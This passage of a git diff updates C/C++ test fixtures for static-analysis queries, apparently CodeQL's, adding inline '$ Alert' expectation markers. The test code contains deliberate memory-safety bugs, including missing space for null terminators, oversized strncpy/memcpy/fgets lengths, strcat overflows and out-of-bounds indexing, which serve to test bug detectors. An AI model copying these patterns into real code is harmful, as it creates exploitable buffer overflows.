-Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +query: Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref b/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref index 9895980e2411..7625942ee0f5 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/OverflowCalculated.qlref @@ -1 +1,2 @@ -Critical/OverflowCalculated.ql +query: Critical/OverflowCalculated.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp index a47679bafc24..8cbaaf3c2e7d 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests1.cpp @@ -23,7 +23,7 @@ void tests1(int case_num) switch (case_num) { case 1: - buffer = (char *)malloc(strlen(str)); // BAD + buffer = (char *)malloc(strlen(str)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -33,7 +33,7 @@ void tests1(int case_num) break; case 3: - buffer = (char *)malloc(strlen(str) * sizeof(char)); // BAD + buffer = (char *)malloc(strlen(str) * sizeof(char)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -53,7 +53,7 @@ void tests1(int case_num) break; case 7: - buffer = (char *)realloc(buffer, strlen(str)); // BAD + buffer = (char *)realloc(buffer, strlen(str)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -64,7 +64,7 @@ void tests1(int case_num) case 9: int len1 = strlen(str); - buffer = (char *)malloc(len1); // BAD + buffer = (char *)malloc(len1); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str); break; @@ -86,7 +86,7 @@ void tests1(int case_num) break; case 101: - wbuffer = (wchar_t *)malloc(wcslen(wstr)); // BAD + wbuffer = (wchar_t *)malloc(wcslen(wstr)); // BAD // $ Alert[cpp/no-space-for-terminator] wcscpy(wbuffer, wstr); break; @@ -106,7 +106,7 @@ void tests1(int case_num) break; case 105: - wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); // BAD + wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); // BAD // $ Alert[cpp/no-space-for-terminator] wcscpy(wbuffer, wstr); break; diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp index 696b566329a3..db6928a7015a 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests2.cpp @@ -31,7 +31,7 @@ void tests2(int case_num) case 1: buffer = (char *)malloc(strlen(str1) + 1); // BAD strcpy(buffer, str1); - strcat(buffer, str2); + strcat(buffer, str2); // $ Alert[cpp/overflow-calculated] break; case 2: @@ -49,7 +49,7 @@ void tests2(int case_num) case 4: buffer = (char *)malloc((strlen(str1) + 1) * sizeof(char)); // BAD strcpy(buffer, str1); - strcat(buffer, str2); + strcat(buffer, str2); // $ Alert[cpp/overflow-calculated] break; case 5: diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp index 7a2cc19d269c..c50addfdd50e 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/tests3.cpp @@ -22,12 +22,12 @@ void tests3(int case_num) switch (case_num) { case 1: - buffer = (char *)std::malloc(strlen(str3global)); // BAD + buffer = (char *)std::malloc(strlen(str3global)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str3global); break; case 2: - buffer = (char *)std::malloc(strlen(str3local)); // BAD + buffer = (char *)std::malloc(strlen(str3local)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str3local); break; @@ -50,7 +50,7 @@ void tests3(int case_num) void test3b() { - char *buffer = new char[strlen(str3global)]; // BAD + char *buffer = new char[strlen(str3global)]; // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer, str3global); @@ -78,9 +78,9 @@ void tests4() char *buffer1 = 0; char *buffer2 = 0; - buffer1 = (char *)MyMalloc1(strlen(str4)); // BAD + buffer1 = (char *)MyMalloc1(strlen(str4)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer1, str4); - buffer2 = (char *)MyMalloc2(strlen(str4)); // BAD + buffer2 = (char *)MyMalloc2(strlen(str4)); // BAD // $ Alert[cpp/no-space-for-terminator] strcpy(buffer2, str4); } diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref b/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref index 477af9d71d07..93d88e7802a0 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/OverflowStatic.qlref @@ -1 +1,2 @@ -Critical/OverflowStatic.ql +query: Critical/OverflowStatic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c index 3c726a452b9b..9072df0feb6c 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.c @@ -11,14 +11,14 @@ void f(void) { c = xs[-1]; // BAD [NOT DETECTED] c = xs[0]; // GOOD c = xs[4]; // GOOD - c = xs[5]; // BAD - c = xs[6]; // BAD + c = xs[5]; // BAD // $ Alert + c = xs[6]; // BAD // $ Alert c = stru.ys[-1]; // BAD [NOT DETECTED] c = stru.ys[0]; // GOOD c = stru.ys[4]; // GOOD - c = stru.ys[5]; // BAD - c = stru.ys[6]; // BAD + c = stru.ys[5]; // BAD // $ Alert + c = stru.ys[6]; // BAD // $ Alert c = stru.zs[-1]; // BAD [NOT DETECTED] c = stru.zs[0]; // GOOD (zs is variable size) diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp index deeb70ffd57d..0248f71e30b5 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/test.cpp @@ -16,14 +16,14 @@ void f1(void) } for (i = 0; i < 4; i++) { - buffer1[i] = 0; // BAD - buffer2[i] = 0; // BAD + buffer1[i] = 0; // BAD // $ Alert + buffer2[i] = 0; // BAD // $ Alert } memcpy(buffer1, buffer2, 3); // GOOD - memcpy(buffer1, buffer2, 4); // BAD + memcpy(buffer1, buffer2, 4); // BAD // $ Alert memcpy(buffer2, buffer1, 3); // GOOD - memcpy(buffer2, buffer1, 4); // BAD + memcpy(buffer2, buffer1, 4); // BAD // $ Alert } void f2(char *src) @@ -37,7 +37,7 @@ void f2(char *src) amount = amount + 1; memcpy(buffer, src, amount); // BAD [NOT DETECTED] amount = 101; - memcpy(buffer, src, amount); // BAD + memcpy(buffer, src, amount); // BAD // $ Alert ptr = buffer; memcpy(ptr, src, 101); // BAD [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c b/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c index cd836d759880..f1f28fbc76e0 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c +++ b/cpp/ql/test/query-tests/Critical/OverflowStatic/test2.c @@ -25,14 +25,14 @@ size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream); void bad0(char *src, FILE *f, va_list ap) { char buffer[40]; - fgets(buffer, 41, f); // BAD: Too many characters read - strncpy(buffer, src, 43); // BAD: Too many characters copied + fgets(buffer, 41, f); // BAD: Too many characters read // $ Alert + strncpy(buffer, src, 43); // BAD: Too many characters copied // $ Alert buffer[0] = 0; - strncat(buffer, src, 44); // BAD: Too many characters copied - memcpy(buffer, src, 45); // BAD: Too many characters copied - memmove(buffer, src, 46); // BAD: Too many characters copied - snprintf(buffer, 47, "%s", src); // BAD: Too many characters copied - vsnprintf(buffer, 48, "%s", ap); // BAD: Too many characters copied + strncat(buffer, src, 44); // BAD: Too many characters copied // $ Alert + memcpy(buffer, src, 45); // BAD: Too many characters copied // $ Alert + memmove(buffer, src, 46); // BAD: Too many characters copied // $ Alert + snprintf(buffer, 47, "%s", src); // BAD: Too many characters copied // $ Alert + vsnprintf(buffer, 48, "%s", ap); // BAD: Too many characters copied // $ Alert } void good0(char *src, FILE *f, va_list ap) { diff --git a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref index 102d4b7138ce..cd7a89e3ea59 100644 --- a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref +++ b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/ReturnValueIgnored.qlref @@ -1 +1,2 @@ -Critical/ReturnValueIgnored.ql +query: Critical/ReturnValueIgnored.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp index 4fbf1f00e33f..f5f138faea5c 100644 --- a/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp +++ b/cpp/ql/test/query-tests/Critical/ReturnValueIgnored/test.cpp @@ -29,7 +29,7 @@ int main() check(myFunction()); // GOOD - myFunction(); // BAD (return value is ignored) + myFunction(); // BAD (return value is ignored) // $ Alert (void)myFunction(); // GOOD } diff --git a/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref b/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref index ca677973aea1..b23dbb86fd80 100644 --- a/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref +++ b/cpp/ql/test/query-tests/Critical/SizeCheck/SizeCheck2.qlref @@ -1 +1,2 @@ -Critical/SizeCheck2.ql +query: Critical/SizeCheck2.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c b/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c index 714ca5de9c88..2dedb4e9047a 100644 --- a/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c +++ b/cpp/ql/test/query-tests/Critical/SizeCheck/test2.c @@ -13,8 +13,8 @@ void free(void *ptr); void bad0(void) { - long long *lptr = malloc(27); // BAD -- Not a multiple of sizeof(long long) - double *dptr = malloc(33); // BAD -- Not a multiple of sizeof(double) + long long *lptr = malloc(27); // BAD -- Not a multiple of sizeof(long long) // $ Alert + double *dptr = malloc(33); // BAD -- Not a multiple of sizeof(double) // $ Alert free(lptr); free(dptr); } @@ -29,8 +29,8 @@ void good0(void) { void bad1(void) { - long long *lptr = malloc(sizeof(long long)*7/2); // BAD -- Not a multiple of sizeof(long long) - double *dptr = malloc(sizeof(double)*5/2); // BAD -- Not a multiple of sizeof(double) + long long *lptr = malloc(sizeof(long long)*7/2); // BAD -- Not a multiple of sizeof(long long) // $ Alert + double *dptr = malloc(sizeof(double)*5/2); // BAD -- Not a multiple of sizeof(double) // $ Alert free(lptr); free(dptr); } @@ -82,5 +82,5 @@ void varStructTests() { MyVarStruct1 *a = malloc(sizeof(MyVarStruct1) + 127); // GOOD MyVarStruct2 *b = malloc(sizeof(MyVarStruct2) + 127); // GOOD MyVarStruct3 *c = malloc(sizeof(MyVarStruct3) + 127); // GOOD - MyFixedStruct *d = malloc(sizeof(MyFixedStruct) + 127); // BAD --- Not a multiple of sizeof(MyFixedStruct) + MyFixedStruct *d = malloc(sizeof(MyFixedStruct) + 127); // BAD --- Not a multiple of sizeof(MyFixedStruct) // $ Alert } diff --git a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref index 086427166cb0..9c104719c2c0 100644 --- a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref +++ b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref @@ -1 +1 @@ -Likely Bugs/OO/UnsafeUseOfThis.ql \ No newline at end of file +query: Likely Bugs/OO/UnsafeUseOfThis.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref index e900e9c5314b..58bc903a431d 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref +++ b/cpp/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -Diagnostics/ExtractedFiles.ql +query: Diagnostics/ExtractedFiles.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref b/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref index 1bf951f18994..9f9498e49c7f 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref +++ b/cpp/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref @@ -1 +1 @@ -Diagnostics/Internal/ExtractionErrors.ql +query: Diagnostics/Internal/ExtractionErrors.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref b/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref index 2df3d933e8ae..68969e9bbf1c 100644 --- a/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref +++ b/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref @@ -1 +1 @@ -Diagnostics/ExtractionWarnings.ql +query: Diagnostics/ExtractionWarnings.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref b/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref index e3f6cd687d3d..3484d485f1e5 100644 --- a/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref +++ b/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref @@ -1 +1 @@ -Diagnostics/FailedExtractorInvocations.ql +query: Diagnostics/FailedExtractorInvocations.ql diff --git a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref index ae0fe399adcf..2597ad4e923f 100644 --- a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref +++ b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref @@ -1 +1,2 @@ -Documentation/CommentedOutCode.ql +query: Documentation/CommentedOutCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c index 2fce1b0e9827..b3cbe90b4f8c 100644 --- a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c +++ b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c @@ -1,16 +1,16 @@ -// commented out code; +// commented out code; // $ Alert // some; // commented; // out; -// code; +// code; // $ Alert // also; // this // is; // commented-out -// code; +// code; // $ Alert // this // is; @@ -23,7 +23,7 @@ commented; out; code; -*/ +*/ // $ Alert /* also; @@ -31,7 +31,7 @@ is; commented-out code; -*/ +*/ // $ Alert /* this diff --git a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp index e7a8019286f3..4818430d85d0 100644 --- a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp +++ b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp @@ -34,21 +34,21 @@ // Example: { 1, 2, 3, 4 } -// int myFunction() { return myValue; } +// int myFunction() { return myValue; } // $ Alert -// int myFunction() const { return myValue; } +// int myFunction() const { return myValue; } // $ Alert -// int myFunction() const noexcept { return myValue; } +// int myFunction() const noexcept { return myValue; } // $ Alert -// #define MYMACRO +// #define MYMACRO // $ Alert -// #include "include.h" +// #include "include.h" // $ Alert /* #ifdef void myFunction(); #endif -*/ +*/ // $ Alert // define some constants @@ -56,15 +56,15 @@ void myFunction(); // #hashtag -// #if(defined(MYMACRO)) +// #if(defined(MYMACRO)) // $ Alert // #iffy -// #pragma once +// #pragma once // $ Alert -// # pragma once +// # pragma once // $ Alert -/*#error"myerror"*/ +/*#error"myerror"*/ // $ Alert #ifdef MYMACRO @@ -92,7 +92,7 @@ void myFunction(); #ifdef MYMACRO // ... #endif // #ifdef MYMACRO -*/ +*/ // $ Alert #ifdef MYMACRO1 @@ -104,7 +104,7 @@ void myFunction(); #endif // #ifdef MYMACRO2 #endif // #ifdef MYMACRO1 -#include "config.h" // #include "config2.h" +#include "config.h" // #include "config2.h" // $ Alert #ifdef MYMACRO @@ -112,10 +112,10 @@ void myFunction(); #endif /* #ifdef MYMACRO */ -#error "error" /* #ifdef MYMACRO */ +#error "error" /* #ifdef MYMACRO */ // $ Alert -// commented_out_code(); +// commented_out_code(); // $ Alert #if 0 - // commented_out_code(); + // commented_out_code(); // $ Alert #endif diff --git a/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref b/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref index 41bcfe740bb4..f46b3b829259 100644 --- a/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref +++ b/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref @@ -1 +1,2 @@ -Documentation/DocumentApi.ql +query: Documentation/DocumentApi.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c b/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c index bb05ef8c015f..398e84f6f6a0 100644 --- a/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c +++ b/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c @@ -26,12 +26,12 @@ void proto5(void) { int i2; int i3; } -void proto6(void) { +void proto6(void) { // $ Alert int i1; int i2; int i3; } -void proto7(void) { +void proto7(void) { // $ Alert int i1; int i2; int i3; @@ -42,17 +42,17 @@ void proto8(void) { int i2; int i3; } -void proto9(void) { +void proto9(void) { // $ Alert int i1; int i2; int i3; } -void proto10(void) { +void proto10(void) { // $ Alert int i1; int i2; int i3; } -void proto11(void) { +void proto11(void) { // $ Alert int i1; int i2; int i3; @@ -63,7 +63,7 @@ void proto12(void) { int i2; int i3; } -void proto13(void) { +void proto13(void) { // $ Alert int i1; int i2; int i3; diff --git a/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c b/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c index 1894482d62f2..650bac038a0e 100644 --- a/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c +++ b/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c @@ -1,5 +1,5 @@ -void f1(void) { +void f1(void) { // $ Alert int x1; int x2; int x3; @@ -29,7 +29,7 @@ void f5(void) { int x3; } -void f6(void) { +void f6(void) { // $ Alert int x1; int x2; int x3; diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref b/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref index 8392f493657e..b81e1a2fcbe5 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref +++ b/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref @@ -1 +1,2 @@ -Documentation/FixmeComments.ql +query: Documentation/FixmeComments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref b/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref index bb57dbe50cee..9bee8d3dbfb3 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref +++ b/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref @@ -1 +1,2 @@ -Documentation/TodoComments.ql +query: Documentation/TodoComments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c b/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c index da16a6640920..e20f4be97547 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c +++ b/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c @@ -1,14 +1,14 @@ -/* TODO This is a simple to do comment */ +/* TODO This is a simple to do comment */ // $ Alert[cpp/todo-comment] -/* TODO */ +/* TODO */ // $ Alert[cpp/todo-comment] /* TODO This is a - * multi-line comment */ + * multi-line comment */ // $ Alert[cpp/todo-comment] /* Some comment * TODO This is a mid-comment - * multi-line comment */ + * multi-line comment */ // $ Alert[cpp/todo-comment] /* Some comment * with a TODO This is a mid-comment mid-line @@ -18,9 +18,9 @@ * TODO This is a mid-comment * multi-line comment with two * TODO comments - * inside it */ + * inside it */ // $ Alert[cpp/todo-comment] -/* TODO This comment mentions TODO in its body too */ +/* TODO This comment mentions TODO in its body too */ // $ Alert[cpp/todo-comment] -// TODO: Can have C++-style comments too +// TODO: Can have C++-style comments too // $ Alert[cpp/todo-comment] diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp b/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp index 5162d68f39ab..a5563e803ebc 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp +++ b/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp @@ -1,13 +1,13 @@ -// TODO: Thing 1. -/* TODO: Thing 2. */ +// TODO: Thing 1. // $ Alert[cpp/todo-comment] +/* TODO: Thing 2. */ // $ Alert[cpp/todo-comment] /** * TODO: Thing 3. - */ + */ // $ Alert[cpp/todo-comment] // For more things, read the /usr/local/doc/TODO file. -// FIXME: Bug 1. -/* FIXME: Bug 2. */ +// FIXME: Bug 1. // $ Alert[cpp/fixme-comment] +/* FIXME: Bug 2. */ // $ Alert[cpp/fixme-comment] /** * FIXME: Bug 3. - */ + */ // $ Alert[cpp/fixme-comment] // For more bugs, read the /usr/local/doc/FIXME file. diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref index 1e431289b172..d179ad8e2380 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref @@ -1 +1,2 @@ -Header Cleanup/Cleanup-DuplicateIncludeGuard.ql \ No newline at end of file +query: Header Cleanup/Cleanup-DuplicateIncludeGuard.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h index a0fa07dbb50a..7de21f0b2b3c 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h @@ -1,6 +1,6 @@ // header1.h -#ifndef INCLUDED_HEADER1 +#ifndef INCLUDED_HEADER1 // $ Alert #define INCLUDED_HEADER1 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h index 9e4ad972812b..cf39b45c0fa8 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h @@ -1,6 +1,6 @@ // header2.h -#ifndef INCLUDED_HEADER1 // oops! +#ifndef INCLUDED_HEADER1 // oops! // $ Alert #define INCLUDED_HEADER1 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h index 57b36896ebd0..a3e19a07615f 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h @@ -1,6 +1,6 @@ // header4.h -#ifndef INCLUDED_HEADER4 +#ifndef INCLUDED_HEADER4 // $ Alert #define INCLUDED_HEADER4 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h index 2148e608917d..89c2abaa3313 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h @@ -1,6 +1,6 @@ // header6.h -#ifndef INCLUDED_HEADER6 +#ifndef INCLUDED_HEADER6 // $ Alert #define INCLUDED_HEADER6 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h index 4dd8875d69d8..d8ea8f603cee 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h @@ -1,6 +1,6 @@ // header7.h -#ifndef INCLUDED_HEADER6 // oops! +#ifndef INCLUDED_HEADER6 // oops! // $ Alert #define INCLUDED_HEADER6(x) (x) // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h index c5e44813dcd2..566227074b5b 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h @@ -1,6 +1,6 @@ // header4.h -#ifndef INCLUDED_HEADER4 // duplicate +#ifndef INCLUDED_HEADER4 // duplicate // $ Alert #define INCLUDED_HEADER4 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h index ed54e7ea68cd..8dc0e496ebfe 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h @@ -1,6 +1,6 @@ // header5.h -#ifndef INCLUDED_HEADER4 // duplicate +#ifndef INCLUDED_HEADER4 // duplicate // $ Alert #define INCLUDED_HEADER4 // ... diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref index 5e38f12f9389..15b0c53ec249 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref @@ -1 +1,2 @@ -JPL_C/LOC-3/Rule 13/LimitedScopeFile.ql +query: JPL_C/LOC-3/Rule 13/LimitedScopeFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c index 96e8dc7ce864..b1a66e8f312a 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c @@ -1,6 +1,6 @@ // file1.c -int globalInt1; // BAD [only accessed in this file] +int globalInt1; // BAD [only accessed in this file] // $ Alert int globalInt2; // GOOD [accessed in file1.c and file2.c] int globalInt3; // GOOD [referenced in file1.h] int globalInt4; // GOOD [only accessed in one function, should be function scope instead] diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref index 